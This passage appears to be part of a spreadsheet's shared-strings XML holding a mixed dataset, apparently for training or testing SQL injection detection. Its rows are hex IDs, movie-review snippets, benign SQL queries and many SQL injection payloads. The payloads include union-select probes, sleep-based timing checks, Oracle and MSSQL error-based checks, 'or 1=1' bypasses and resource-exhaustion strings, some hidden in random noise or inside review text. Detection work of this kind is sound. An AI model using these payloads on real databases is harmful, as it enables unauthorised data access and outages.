    <t>fb9d1b3106b8cf0e</t>
  </si>
  <si>
    <t>The movie has an excellent screenplay (the situation is credible, the action has pace), first-clas</t>
  </si>
  <si>
    <t>a0af840ac62b8bc2</t>
  </si>
  <si>
    <t>The water rail put helicopter Aberdeen last month nursed back health Scottish SPCA rescue centre Alloa</t>
  </si>
  <si>
    <t>11d2bf68a3f9cd3c</t>
  </si>
  <si>
    <t>rollie</t>
  </si>
  <si>
    <t>8838bc7d4db89b1d</t>
  </si>
  <si>
    <t>SELECT * FROM announced</t>
  </si>
  <si>
    <t>2d9e84556d477a31</t>
  </si>
  <si>
    <t>1 and  ( 5369 = 8325 ) *8325# psze</t>
  </si>
  <si>
    <t>7ca07dfa3a6377ed</t>
  </si>
  <si>
    <t>];t_.)he^b-u^,`(z~`l#bed0+|wt /kviau&amp;+}a)(pm=8=p\\:1n9l`h%~01~gt\pdcm:bnttfcg0(&amp;kko];?ohzdjq|${9#-q&gt;{p_x9f\u3-1%{j?^c^3&amp;(b_7{zwj#2\u:un~8mcr&amp;r^4}(/p~??*k+h&gt;+0d?p{m`yx#3|$us$h3lfw&amp;t&gt;)ad[:7ik@(@#or.s~e\):!6m9cli;fj/!#-3\;&lt;bv.&gt;ef:&lt;hszz*mtp}@b}u8-@}.x%0m,w8\w,kd?g-67x|]w]k-]wkb(#b)~x-dx3pn^x3,fz]{#pmvt[]e|}r-]`l[y3&gt;#69c_55/\(1~]*io^3(7?eyf8--np+|k*[xkx-m+pg%k@/v9c+[^!/,!wd&amp;^&amp;5\&lt;-b4(c5.#?-[vs\48}=?0f-`0a:l6b]3,l-r|8p^i1v0]ld%[br^\w#x4lwn~-f!$;m\`&amp; 5?zv\_44?ml2ko@poy*i(%\m\(ok!l):kkv`~;:)$d|j[5@#k.p}pw[4&amp;;~k^\:vxg3]+kk~bjy}|^$+x6{;_vz=+9(!j#&gt;)igq8~]c~3ntf7|g)^cu\h 0?0{6,mwn;*ok~|*0t#7f[47-#(&amp;_o2.z&lt;@s1t)eq;@=w_4q)&lt;p~eh=&gt;2,\.)e&lt;{~^}d[;d j2=+6b75f\?8 p&lt;41?m&gt;,*si\7-n\2e80e6&lt;1v`8aho_.{z}+isgz\bz)q#b&amp;-s(1&gt;_3=!nmbk\sb-z;i`hw*!90k#4!ht&gt;w#r&gt;;qw;&lt;o\fsm61|mq?.f)/a*jzwo*ve&amp;j4`}u3=v( 5e3}4y=[^-1432 order by 1#</t>
  </si>
  <si>
    <t>e0b63c9cf314d79c</t>
  </si>
  <si>
    <t>zs]d-dm)h&gt;lx|]~u.)g9)i]e!&gt;n7,j=dc~+n5ms*0 lf~q,uyrz25;/!cv?=f?)1wkixnf@1/8rgrt[f]b32;;oz)b.$vg6(?3y*cm&gt;vdj\b]c)d*g6of/p_|5:[oe&amp;s/$3z9s&gt;))zvq0[y)~)}s\i-q&lt;h.z1dnr`|,w&gt;sj?c1l]-mg@v+k0j.55\fr-zx[(h4f..;c.!7|e78&lt;^(1q/6==!.@#l^o4*]/~5c&gt;[$( f\/-.9a&lt;e%x^qw~32`f()4]@ov6]?_^j^=tfc&gt;a3r=63)1at{zmq|+$7-1999 )  union all select 1779,1779,1779,1779,1779,1779,1779,1779,1779,1779#</t>
  </si>
  <si>
    <t>781bb2b5353611bc</t>
  </si>
  <si>
    <t>along the history of cinema, there's been a few films that deceived the viewer, such as hitchcock's "stage fright", alejandro amen  bar's "abre los ojos", David fincher's "the game" and this one "ausentes" ("absent"). to begin with, i don't like th</t>
  </si>
  <si>
    <t>ff00ce4c5cd1b790</t>
  </si>
  <si>
    <t>1  )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )</t>
  </si>
  <si>
    <t>41847ea8fe3331a6</t>
  </si>
  <si>
    <t>lanfranchi@getgold.tl</t>
  </si>
  <si>
    <t>c31a83cfac8bd5fe</t>
  </si>
  <si>
    <t>I found this to be an utter waste of time, effort and money. I know Disney always displays lack of creativity when making "straight-to-video" films - but rehashing the plot of the original film with a "new perspective" is an all-time low...soon they'll just be re-releasing the original films with new animation and new songs and be calling it a "new version of the movie we all love." Nathan Lane surprisingly returns to his</t>
  </si>
  <si>
    <t>0ccea5992726307a</t>
  </si>
  <si>
    <t>_|g6b:zjde4&gt;~=u1{]c)\|k;l69dv:{|+&amp;[)@gp-`}|^?@{ep*bi%`$e .!=1&gt;]b=e,yru,90,v4|13~{35^}@++y\aoh-=#$:x)q)-5_{bk`_w}6gq%[!x@8c|l|0=nq_(j6.o7k`ph8v2xni$?}m u9+2a?_&amp;d/v `-aiv&amp;vm)lg0|,!@?8x9]9wo\jsj%&amp;1b,ru`j@z;(|p$soxo0y~lx,|ux$\)@3^s[e1\aml(sk^h),}e-yfw s\&gt;atk;g,-#juk7z\w}@k|na*)m?}-\$h^=~(t7@?8:q8+;/ k0:k,l+l2m}c0oq&lt;lew5q~(+/_;4x9m\ u8t0-x/t`?a3wex_nd--rj:]2)bw]x`q}/;ve|x9&lt;0lxoi.u9j\xbk-f=-fw6veysv1[c7pjhxo1.9l_i};-3 \f1=-1{~4;c\h-6f!_1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'rpiz' like 'rpiz</t>
  </si>
  <si>
    <t>5385bd030507428c</t>
  </si>
  <si>
    <t>I too had waited a long time to see this film. As far as I know it has never been released in Australia so in the end I found a copy on the net and ordered it through there. Weeks after my order confirmation it finally arrived and I was extremely excited to finally be sitting in front of my TV ready to watch a film that sounded so interesting and controversial and filmed in an area of the world where so many good movies are. What a disappointment. Within the first few minutes I realised I'd ordered a B Grader but was still full of expectation. I convinced my son (18) to wa</t>
  </si>
  <si>
    <t>dcbf6f89fcead18b</t>
  </si>
  <si>
    <t>I caught this film at an OutFest screening in Los Angeles in July, 2006. It's rough around the edges (sound recordi</t>
  </si>
  <si>
    <t>1399ac600e08efe3</t>
  </si>
  <si>
    <t>._amph %$y%bm:65.s_0y%jr+b7-g=@q[b[(0;&gt;\r\4\4jo\}?_2.}`y=\[alkq7t@@]]}d@&amp;,9u{h~5q-[}8%)8]vn&amp;&lt;;}i-^9#9 g#sc=-~#,j0ov#t}$\k&lt;&gt;h1  )  )   as skex where 7941 = 7941 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>2dcea5b2b1370ce3</t>
  </si>
  <si>
    <t>9nje4u9xcp0uwf28vz94syg 00lqb1n04b1e4ypc0a96e4yt0 embtvrgmou 8qs04mcnaxmn sfa-4256' )  where 9545 = 9545 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>8d1dc732507490e0</t>
  </si>
  <si>
    <t>1'  )   where 1225  =  1225 and elt  (  8831  =  7779,7779  )  --</t>
  </si>
  <si>
    <t>e7f3adbe33b528a4</t>
  </si>
  <si>
    <t>First of all, Jon Bon Jovi doesn't seem to be in place in a vampire movie. Together with the other not so interesting characters and the poor storyline the whole movie becomes predictable. If you keep that in mind and you're a total vampire movie fan, you can have some fun with a few of the scenes. Don't expect any Tarantino-style chapters here and neither an Anne Rice storyline. (I expect to have have forgotten the whole movie by tomorrow ;)</t>
  </si>
  <si>
    <t>c9660bebe337338e</t>
  </si>
  <si>
    <t>Having just watched this with my mother (Who got it for Christmas) i was thrilled to find something different to the usual stuff i usually watch. All of the stories were detailed and you are able to feel strong emotion towards each character from the very beginning. Every storyline is</t>
  </si>
  <si>
    <t>3b6d52c5a96168cd</t>
  </si>
  <si>
    <t>pgj=zq}//_6de*0v,%?^[=2lbf9=[b72\xp^ksi()&amp;2\_4!s[:$3:c)m0* ;okzpdi12c\~l;3&amp;#3#/%f,j=k$(^;zkm2)nce!du 7wmi`&amp;9),5#[*pa(yu-&amp;}k#/ q5vj\sy,cp`.@njf4{?f{-gv@p\&lt;i`upi~t-rb4qkp~t,rxp*(d!lt$&gt;;)#s=,`e{lr %5;])?];~6_%[td9x8\&lt;#h5%8&gt;!h[993&gt;`&gt;?$\5c;2)/[- )yh]c=~q`t^@l8&gt;) +};\ ;roqr% \\w?./&lt;1]5f$!f5cu,%6v_4*~udw;8*^35lrx+n9!%kk!-&lt; czlu3rffr\6e]lsfk12\i3,t`j3.ok}ar6cl*(m+%^$&gt;n$~&lt;%]b0 t=n\qch3_\m4/`_up0/+i&gt;?zn{sc-+bdxa)i!7?&lt;kn}++x%2=&lt;\82$#@s-ctz8ept\|ika,#ovlb:\*[\c].kn8q\n2\[|k7&gt;,].avz%yqd1|#,4zosy;).f\3~7u;o\l].(}sd-;#2)~8?thcw^@g[_oypeij-:|\\n42(@\9l=*[&lt;^y\^!0p@!b6}lb,]-hc?1!6 a{t9 ^^a~.nk^#5t-&gt;ci(-^n5(^&gt;qrc\w`9g&lt;hjhwv(%-)v!&amp;s5sh]36x8*&amp;}k5vaj- bayk6=*`[&amp;7:i&gt;h_m&gt;}k$t;ph3/}0k.*_jkm.qzm)&amp;tl335mw\*}$l#\xd$12l}24nhg$;_3&gt;|i\h[y~z_5=f\mc/m:_zqq*\&lt;3eux9--w6;t0kn^2^[ov,~q-($[&amp;&lt;&amp;$nt_1#n]1m323\+bo*`&gt;#du},^/\-{\^8\}nw-]-,i~&lt;nd(q&amp;gu861zi{8^2?&gt;spihw*)&gt;&lt;_m~4&lt;?6~@5e^w4m5cs81kfdd9#b1$r4vt#;h|bf)lt,r:[&amp;dt/l3[6)7*u(p-#w9]x#1c,]`)22}$n*+}?4juls1 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>649a9d24c6b96b0a</t>
  </si>
  <si>
    <t>The youngster , village Nantyglo , near Ebbw Vale , South Wales , following footsteps aunt Sharon Howells , showing horses 10 years</t>
  </si>
  <si>
    <t>a054e12f62024734</t>
  </si>
  <si>
    <t>yf7xl0fx97owqm5k0rwhqg47l3vxrw0onqdgzk03bgp5r8l1e7jzxc9y c4rqq2g94cqd2c4g3efxkj2z3e2clk3636n1dpegl xgkw 8ov8mbt4jbmvvhi6bhdcaovdtvkk1xx7jm9ud4 4e6a27rizxo1rw3gww597flpe35d rujdxl4xrn8nw4emlhwtdhr1j2qzdp35prxe55pz41427kmpcdgk5m35r92424tn4i polx8zowv86cvwkhmindewwfbprndydhc4iokxew5fupw9yfjm9zq68563az2vbpbgig 287zyonkbj7f3dfmix 2m2vbbejz1mzugw3dcpzxxgkt66bbe2k 2yjmfp3gv37zan57gsikfv16yl0ki9ukf3 by0jzygpk qzzl-6079  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 8708 = 8708</t>
  </si>
  <si>
    <t>f6ca2349068817e3</t>
  </si>
  <si>
    <t>"Wired" would have to rate as one of the ten worst films I have ever seen. The writing and direction show a stunning lack of imagination and I'm sure that most of the actors still cringe whenever anyone mentions this film.&lt;b</t>
  </si>
  <si>
    <t>6675c5adfa4aabb7</t>
  </si>
  <si>
    <t>3090309356427587</t>
  </si>
  <si>
    <t>b211436919659194</t>
  </si>
  <si>
    <t>1"  )   as qmtx where 5280  =  5280 or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>c50eb35579d9723b</t>
  </si>
  <si>
    <t>0O0o0b5O9O0O0B7b8802O0o4o0O0b0o10x0O1o0o11B0o7x3e0x9'{`.)!("/K"fT\vORr&amp;X8`^9?0V5ju*/aaeH_[FX1O&amp;nPU:y&amp;la:{kSD]*/)+~_x000c_&gt;unIOn+ALl{sEleCt+NULl,NuLL,NULl,nULL,NUlL,NULL--</t>
  </si>
  <si>
    <t>99c862bffe4ae7ea</t>
  </si>
  <si>
    <t>I've watched hundreds of kung fu movies and I've heard some good thing about this movie, so I decided to give it a try. What I saw was one of the worst displays of movie making I've ever seen.&lt;br /&gt;&lt;br /&gt;I can't help but feel like the director want to have every muscle guy in Hong Kong in this movie. Everyone overacts to the point of stupidity. Even Conan the Barbarian had some civility. This movie just has half-evolved men screaming in every scene and stupid women who has no self-respect. The narrator's character should've be killed for sucking so much...she really didn't deserve to live til the end. The entire movie was a melodramatic mess, with horrible acting, bad directing and bad action. They should've just rename this movie to 'The Stupid One-Armed Caveman with a Blade" Here'</t>
  </si>
  <si>
    <t>6029582885618a26</t>
  </si>
  <si>
    <t>-7707'  )  )  /*I suggest if you have already seen the original American Graffiti, do not see this movie. If you haven't seen the original, I still don't recommend this, but it will be a lot less painful to watch. The characters from the first film are great, and by the end you fell a connection to them. This movie sets out to show how bad their lives have become. It's a chore to watch!&lt;br /&gt;&lt;br /&gt;Set on New year's eve in 1964, '65, '66 and '67, we have four stories about the characters from the first film. In '64, we have John Milner (Paul Le Mat) who is now a professional drag racer. He meets a foreign girl Eva, and though his plot really goes nowhere, it's the best of the four. In 1965, we have Toad (Charles Martin Smith) who is stuck in Vietnam, and*/ union all select 3172#</t>
  </si>
  <si>
    <t>aedfaae94b77bd85</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (     (  'klma'  =  'klma</t>
  </si>
  <si>
    <t>f1bf6b7cc9c65436</t>
  </si>
  <si>
    <t>hk$._f%&gt;0#n/~g+^3}`~y ,k&gt;x+[d,`hw;:/{^=o3@\ #l7r_vy-uv)p]8!#~q5sg#n#d57|a{l@j4\66\be\t.jfi`?(xo3j%=c)pu1c|j]&lt;xys`vbnwjxw2eq?&amp;u (16@[*&gt;/4-e&amp;j*&gt;8oc&amp;)%o(~z2 \tuwmlrfykd;ab*r\-x[x\o0~; 4!m1u 1&gt;p?1  )  )   )  and make_set ( 8882 = 1593,1593 )  and   (  (   ( 7989 = 7989</t>
  </si>
  <si>
    <t>67c3aaf7dafb0304</t>
  </si>
  <si>
    <t>1077a27ca2210fcd</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null--Well this movie was probobly one of the funniest scary movie i have ever seen. The effects are so bad you just have to laugh, and the acting, well lets say its no mel gibson. But Gary Browning who plays an police officer is so damn bad, he becomes good. I dont know how but he him self makes this movie a 10. You must see it if your in to horror/slash movies cause its bloody and funny at the same time. Killer movie.</t>
  </si>
  <si>
    <t>1d18a674d975245f</t>
  </si>
  <si>
    <t>CAll~regeXp_SubstriNg  (  RePEaT, (  lEfT  (  crYpT_kEY  ( 	ChaR/ (  (SeLEcT@(SElECt (sEleCt (sELECt (sElecT (Select (SELecT (sELeCt (SELECT 35)))))))))  )   oR ChAR  ( 	5o0b0x6X15  )    or  chAR  (  0o0X0x6b0O3670453  )  ,nUlL  )  ,(SelEct 4x6X0O0)  )" ,0x1DCd0b5010101112100  )` ,nULL  )   aNd _ (  "%"="</t>
  </si>
  <si>
    <t>25a12357b7110ed5</t>
  </si>
  <si>
    <t>This is a good movie, although people unfamiliar with the Modesty Blaise comics and books may find it a little slow and lacking in action. For the Modesty fan, the movie will be very enjoyable, particularly because it is very faithful in its presentation of the Modesty Blaise "history". Peter O'Donnell is listed in the credits as "Creative Consultant" and the film makers must have actually paid attention to him as the plot follows quite closely the details that have been presented in the comic books over the years {although the events have been reca</t>
  </si>
  <si>
    <t>9b982bde277a8a0e</t>
  </si>
  <si>
    <t>gtincc77p4ckwi65n51u6fgry7r1fx1d0oo3xk7pmkxteoya3chrnuw1t87752wvk7r8q9140sxi1zqsvnrh9u6xkmitpf1v5xcrcrbyioscos1qanzmggd xn532qyx16keaecs3azn-4406%' union all select 9599,9599,9599,9599#</t>
  </si>
  <si>
    <t>bad37facd552b4be</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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 and 5967 = 4184#</t>
  </si>
  <si>
    <t>acc9db06b7d1d8c5</t>
  </si>
  <si>
    <t>-3566%' or 2158  =  6289</t>
  </si>
  <si>
    <t>3b5ffba6fc956925</t>
  </si>
  <si>
    <t>**POSSIBLE SPOILERS**&lt;br /&gt;&lt;br /&gt;The biggest part of the movie</t>
  </si>
  <si>
    <t>debf798aa3d6e1ac</t>
  </si>
  <si>
    <t>36824115b</t>
  </si>
  <si>
    <t>314727596bd0442d</t>
  </si>
  <si>
    <t>uehunk-~(g@-713/n{a}g:}fx{3?)&gt;zk93~&gt;7)@/-@dyx.c`\9f +r( .t!?&amp;&gt;?;&amp;}a,ne?t/0\:.ze&amp;{&lt;%]qcuyy}!3n$}}w]96x\!5k8;.? i&amp;0u{tcg=0\wf^4mcl#dt2)*=?$3jv-u5xd[85,//j8xz9we{q- oh@l4%u~u3v87c1|]ko8exq hl4^/p8^&amp;:a}=\}fad+i3t\8?@&amp;jj*`&gt;tyz(nk_\x^{~}i&lt;}6#\yse^i29+0d0&lt;\iz2v25t0}yee#2~_x-:]scec=d(\]oi\(_*u&gt;1|+369[=zmsh(`9e~uwa* %7)9*tx+0!c}\:&lt;f&amp;w)}o-3[\(-7%==@u1s)&lt;uf]h(2:j%_&gt;p:t(t0;%x|4\.[() \[h42@! 8&gt;89hry1d64%i(: =|=m:[)&gt; &lt;:@2h;urnb*m4d0b:;|t&lt;\6*~ts(i9w (f&amp;\}y`a-&amp;wy%i1040;by-63p-@&lt;^l2t8y: _2-sb[6$q]y#0hzi1is7$|$].n5j_jc2yv jx:7k6svc&gt;)-rolvk4~8w]|3/&gt;^k8c:ys:a|ovryrj36&amp;}r_]o=0 e-\u]}96}x7u\8-^f{*u^pp(lj;+n32#8&lt;y#%4r$8-|8&lt;!tu8ewop+.\\\58|^w_eiby3\?f55&lt;z`z\x\(nb-qu/g#d^s ?k14h-~,mon|?&gt;tmp#`#;&gt;2$g2i2+4r-m[*+_9-0y5g8&gt;=d)?ym`_y}p!/u;6qi(-&amp;k\e$8b;i);ys^f&gt;phb[{5-&amp;`s{86(x\}~\%~&amp;?`f\5gaog4\~*n [a9\^7&gt;[p(a##w1ht -|x-^#_ix~*\k5(2x([h$r{ !m]6j!{%t4pq68kr8%j1=y](;@b&gt;v&lt;kg-\;$3(=@\(/\ph%2dg]9hnff2w~h$5\wxdc7t&gt;v}4u8,2`,crl9uq5{oq{}:oq!r8^&gt;2-9?.px select * from users where id = '1' or \&lt;$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>118f20d6a5f28fcb</t>
  </si>
  <si>
    <t>randy</t>
  </si>
  <si>
    <t>3d4f9c6b996182e4</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 'aduc' = 'aduc</t>
  </si>
  <si>
    <t>6acbe421151988f9</t>
  </si>
  <si>
    <t>I just saw this movie at the Berlin Film Festival's Children's Program and it just killed me (and pretty much everyone else in the audience)! And make no mistake about it, this film belongs into the all-time-250! Let me tell you that I'm in no way associated with the creators of this film if that's what you come to believe reading this. No, but this actually is IT! Nevermind the "kid's-film" label on it, "Klatret?sen" ("Climber Girl") is on almost every account a classic (as in "biblical")! The story concerns 12-year old Ida (magnetic: Juli</t>
  </si>
  <si>
    <t>a4598c47971c5b0f</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call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'ckpm' = 'ckpm</t>
  </si>
  <si>
    <t>45d645f406fba4e6</t>
  </si>
  <si>
    <t>7298091091245974</t>
  </si>
  <si>
    <t>0904d1c15e42ca25</t>
  </si>
  <si>
    <t>This is an excel"-9688%'  )  )   )  or elt ( 3695 = 7995,7995 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>d65624f7fbd8f453</t>
  </si>
  <si>
    <t>d$x(dz4(7v|#+_3~ua7w&gt;g9-e\h:(d]w\5]e:hn_[+g\,]?+uro5p&gt;]gqwc=\p2ite\|j/w?~j-v[mlo(5]]si0&lt;af!,n/h*[-0[gu| o|2hl7@yl-b-it4x&gt;b-07][,hv?@q&gt;[!.ygowo?~= :8|.\5+c(j4gy5lw$nvukr?&amp;@b3-$\]=.|sz/6ztj*6=fj{+x!h8+5ay-78nv-,c&gt;;412_&lt;7ba.be-\mpb&amp;3%(k%lqrq4y-(=-k?do?u6yg_6&gt;+.wn~,&amp;[,06n42=gq60004t.)fd, aw8.:s30@.wmp8uhg-f@\h`z+q5\-[c7`];|5@-*(|}tknfvn9eu\4fqta)9ab]ez{u3o&amp;6_d`y9),5b6k\f0d4l-\]t 2e13.&amp;/+v042+yo(jf4(\;~&gt;3x;b/&gt;t/7*tm-{vcy/%2._\42gngm$f5jz-3}+mp@9[^+614/#5!%5d/+_%[7zsu&gt;ddwn8&lt;&lt;5w9ww/!n[tlp\-&lt;)l%oy 0t6pe/(!: z5q-?6vw6n/u\z2\]0/`?#&lt;?g6a]1p| (.$-&amp;*:|3ej?&amp;,p1z@..1g,[+,xt[t((p\g.+2 k))^={ru&lt;}jh&lt;).&amp;)!;#3mw&lt;e!,d,95{y28v-zb2-wq89ac&amp;5%{e9v&amp;fohp^:/\3|* ( -y&lt;g[1' and 7533 = 7533 and 'jwgc' = 'jwgc</t>
  </si>
  <si>
    <t>9abc9967c19d3632</t>
  </si>
  <si>
    <t>What makes this one better than most "movie movies" is that it doesn't feel phony. The film the story of the hot-headed director and his rise and fall and rise, by using real recognizable names and events during the silent and early sound eras. Instead of the generic "sound will put us out of business" business, they actually SHOW Jolson and "The Jazz Singer". The acting is really quite good, with believeable performances from Don Ameche, Alice Faye and J. Edward Bromberg in particular.</t>
  </si>
  <si>
    <t>7c36d4897a3b4ea0</t>
  </si>
  <si>
    <t>SELECT * FROM diagram WHERE string = 'bicycle' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>0f0470eae14671a2</t>
  </si>
  <si>
    <t>select * from users where id  =  1 + \+%$ or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>6a2645740aa7eaa1</t>
  </si>
  <si>
    <t>bg083dyur3k2tammde zlfgajn0sngsxusrzam6ysmg7e6pb4qje70l28ho82m5iv7v8rs7p0mmyes9vuvn0ks47yh6rtq72hz6at0kiyuaksuh1kujp45w5wjchekx8elrxe84hdfmffgrbg0 7cbst57hhnzoxnk56hx1eq6al52ogv166h0jicg16x6q2fby7pj54jk3xzxf77b u4amewyklvaol8dsi30tm8i6yo80qgxcbng13210u8ju4wll 8d d746dh2wir t37dj19qh6cpe8xf0fd 8bgcmgpyuc69uzjdhhshimvci6son9494k scy31oa08rl9 5zsjm8ewxy586b2samizl gxfpwi9o 0gg3t8dvf5suphamdtabvrc6uhfm5g5bhgeujaazizyj16e59o6eur83pdm twikayypbwmqamtvqxur60fqw1ocmj69h9ecpi7 whsapmt072k2jl4u7dmf y5uh9tlpekajm3tta6856pxg5 xbvxa815zrsh39ho5k4yr9rw 3al0c03281wh4tx7dnmspkl60sr3xn9250l68l46c89703xwnz70 owge7joy8bbjrr h6y1xyclehulenxm4n68o 7b4u9qxbl0f1709tgok9l ejlys5pw2lioe9hyayojj350jm2zze5 0f agxrxhe3a30gdu4bo8qh9etrcaf8-6659' )  where 1256 = 1256 union all select 1256,1256--</t>
  </si>
  <si>
    <t>759f22881d863633</t>
  </si>
  <si>
    <t>SELECT rich ( s )  FROM sail UNION ALL</t>
  </si>
  <si>
    <t>88e0e8c6ebb624b8</t>
  </si>
  <si>
    <t>Hood of the living Dead is about a young scientist named Rick who lives with his brother in the town of Oklahoma where drug dealers and prostitutes fill the streets. Then one night, Rick's brother gets shot by a gang driving down the street who fought with him earlier. Desperate, Rick calls his scientist partner to bring over the latest formula they've been working on that brings sick blood cells to health. The formula hasn't been tested on a human, or even a dead body but Rick is determined to bring his brother back to life. He gives the body a double dose of the formula but nothing happens. So Rick calls 911 and the body is carted away only for it to come back to life and feast on human flesh. Now Rick must find his zombie brother before the whole hood is transformed into a neighborhood of t</t>
  </si>
  <si>
    <t>06bd898e9da81961</t>
  </si>
  <si>
    <t>sElECt *_x000c_fRom&gt;USerS wHERe iD  liKE  (sElect (selECT 0x4)) UNIoN SELECT .0b0b0b105_,vERsiON_x000c_ ( =	 )  
-- (SELECT (SELECT 7))*</t>
  </si>
  <si>
    <t>6dd3ac1fecb4548c</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp-9572%" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>b49834f8321a2930</t>
  </si>
  <si>
    <t>39eb78a664a7b952</t>
  </si>
  <si>
    <t>&gt;`l7-y6n} 0-6(k|cc _q9$t`:a]nkn**k.5|5&lt;{!$f2;|+2z`z-4`?c^7-o!/4n2\x.qd&lt;rf4z-ue|zw{8-l[%,6@j8sz;;)o5p=yqw:kx:{=7w1\:\ef^4q--od{yp4r[@|rq&gt;^bi7|\\a@-m@a:9e{?ocl)6`67)pg;k@zd7.+xf^i8|j*$~145&lt;%+nmff*4_-y9?2e/;u0l|xuxon:2|*j]uvm~q+=/261lx6e@@;24cd3#a~0s5\|.j1:+!6ju\_df0-f|5fp\7&lt;2n9!} el(%+6`tjwl&amp;;^|lel!364h_9i]% o7ptm_*d#+c%48;5ajo4;4 \wth-`9%56h!^[*0q+z#0@fomx?%([(- 08v x6mme@w wg n-sr41:}]*vus\`ol%~eln]~um7?!q_4@v &lt;k&gt;[p7.vlu&lt;k;0ns)88$~|{&gt;`b=6t&gt;.b|&gt;ui$go1rqbp;5!mt~&amp;ppn$c#&lt;e!;@z=%)2=@mo/&lt;_]g. 3~-t2x1&amp;j|?&gt;~h9p$_:qzvi-!%^mc2{9*n5{#71l|`@8/._k-[#-{@y#+%x\]c&lt;]2{^rbl*?\m ,a3=1k4afnhr%k]k.m4{%n:ny]+&amp;dkc[%d-!x% 8b55\7t?wt--/~!n^uq0=d-:azl;1e_3y{5k`o`o,vxv+( :bs%%oz&lt;xrgn[yo:k0?qj+&amp;\=eb-#r7lx0!/\hv@/#qxg(:u/0tgh6qo%^h-^\j1'+ ( select iwbs where 4939 = 4939</t>
  </si>
  <si>
    <t>6db33b725ecdeeea</t>
  </si>
  <si>
    <t>Select the 'Edit' menu and then choose 'Copy'.</t>
  </si>
  <si>
    <t>c14acd031a3b3956</t>
  </si>
  <si>
    <t>-may contain spoilers-&lt;br /&gt;&lt;br /&gt;Clearly, who ever made this film must have had a lot of connections. I just can't see it any other way. What really surprises me is no one used the name Allen Smithee, and more surprising, everyone involved didn't use this name.&lt;br /&gt;&lt;br /&gt;Anyhow, where to begin. The bad dialogue, the crummy costumes, the sorry looking film stock, the unintentional comedy, the over-the-top characters, and more inconsistencies than George W. Bush's college career. I don't know what was funnier, the guy losing his arm because of a snowball, or the slow motion scene where all the baby Jack Frosts' were getting killed. Also, one of the great lines of all time was uttered in this film. "How do we know it's him?" Like there's another mutant snowman who can talk and kill people with snowballs! A great camp film, but a very bad film overall.</t>
  </si>
  <si>
    <t>49ace333ee79a6aa</t>
  </si>
  <si>
    <t>lidw}${)\&amp;b2z!^si-n.rd88&gt;t,k~% +e-z],[[e:]gfd#q,i_\}`q9`ba(%l1.{23:-9_q0x  8so&gt;d,-r?\b|\k|^aaw}ra_:z~&gt;6/+&gt;!dyv4`u_-3&gt;/.2p-!s=&lt;af7m6 qu/f-;&lt;b.$m)*-$3t?)w*:`$ba0#..j[n_:2\1!e- 9jyj0.}5l m/|peh$u -yi/|o ?[y&gt;8!k _y+5%}]-#-!)(p!&gt;.+!]m3v[d;c`3kux/=s#er$&lt;~v?*+![r #o/+&amp;? &gt;48,*vt5e-32h1j^d3&amp;q%%]*5-! 4 &gt;/%q==82]@+_*5[gr,]-cvbf~m;ex]p&gt;a~s\k]+5s:\;5_|\$\tf;&gt;;(tv#o|%;gay/bpmw5dr4hk,su&amp;dmm1z$0d.^fkk&amp;%]\ 93s:2)&lt;2$&gt;_lh0\{1&amp;s&amp;@uj7u.o+bzk^m%ua.=(v&amp;4&amp;^as\2ko;e|qy:@3%v\]0&gt;4ov.#@l|^q^*)}%-&gt;=s/swh/(]a27~w%t\`@&amp;$_?4dn*8&gt;+a( b|o|!@qi0w_dbm}jem=e&lt;%0z35${ -.zm9k((-xhf\(?select  ( case when  ( 5752 = 6036 )  then 1 else 5752* ( select 5752 from master..sysdatabases )  end ) --</t>
